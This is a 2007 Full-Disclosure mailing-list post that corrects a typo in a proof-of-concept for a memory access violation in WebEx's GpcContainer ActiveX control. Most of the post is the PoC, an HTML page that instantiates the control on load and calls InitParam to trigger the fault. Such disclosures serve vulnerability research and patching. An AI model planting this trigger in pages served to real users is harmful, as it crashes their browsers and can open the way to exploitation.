[Full-disclosure] WebEx GPCContainer Memory Access Violation

Elazar Broad elazarb at earthlink.net
Wed Nov 14 02:09:33 GMT 2007


Typo in the original PoC. It should read as follows:

---------------------
<!--
Written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
        var obj = new ActiveXObject("GpcContainer.GpcContainer.1");
    
        obj.InitParam("A");
}
  </script>

 </head>
 <body onLoad="JavaScript: return Check();">
  
 </body>

</html>
--------------------- 

Elazar




Full-Disclosure is hosted and sponsored by Secunia.